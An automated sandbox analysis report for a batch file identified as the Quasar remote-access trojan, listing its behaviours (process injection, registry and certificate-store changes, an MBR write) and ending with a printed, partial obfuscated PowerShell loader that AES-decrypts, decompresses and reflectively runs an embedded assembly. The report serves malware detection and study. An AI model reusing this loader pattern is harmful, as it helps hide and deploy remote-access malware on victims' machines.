Analysis Overview
SHA256
d34225f65c10acac82f381cf0f4281b2bc691afb2b72a1331acee94ca10e5c1c
Threat Level: Known bad
The file Uni.bat was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
Quasar payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Sets service image path in registry
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Executes dropped EXE
Checks computer location settings
Checks BIOS information in registry
Enumerates connected drives
Looks up external IP address via web service
Writes to the Master Boot Record (MBR)
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of UnmapMainImage
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Modifies registry class
Modifies data under HKEY_USERS
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-11 17:41
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-11 17:41
Reported
2024-06-11 17:46
Platform
win10v2004-20240508-en
Max time kernel
300s
Max time network
270s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 3188 created 612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened (read-only) | \??\G: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\svchost.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | ip-api.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | \??\PHYSICALDRIVE0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 3188 set thread context of 4924 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\SoftwareDistribution\ReportingEvents.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\EventCache.v2\{4E3A2C56-F6CF-44DC-94A9-BA869AC1A54A}.bin | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\Logs\CBS\CBS.log | C:\Windows\servicing\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Windows\Logs\CBS\CBS.log | C:\Windows\servicing\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | C:\Windows\system32\svchost.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\mousocoreworker.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\mousocoreworker.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f2-97-fe-bc-2c-3d\WpadDecisionTime = d9f2f21427bcda01 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f2-97-fe-bc-2c-3d\WpadDecisionReason = "1" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9ZSSIVseT17UszvdY4C5NHz76P6SG2gulfr28Vowtr0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iKcHjGMUp8jMw93DJpJszA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dvDwv=New-Object System.IO.MemoryStream(,$param_var); $bxxfa=New-Object System.IO.MemoryStream; $TRmaY=New-Object System.IO.Compression.GZipStream($dvDwv, [IO.Compression.CompressionMode]::Decompress); $TRmaY.CopyTo($bxxfa); $TRmaY.Dispose(); $dvDwv.Dispose(); $bxxfa.Dispose(); $bxxfa.ToArray();}function execute_function($param_var,$param2_var){ $NYMID=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqTZr=$NYMID.EntryPoint; $tqTZr.Invoke($null, 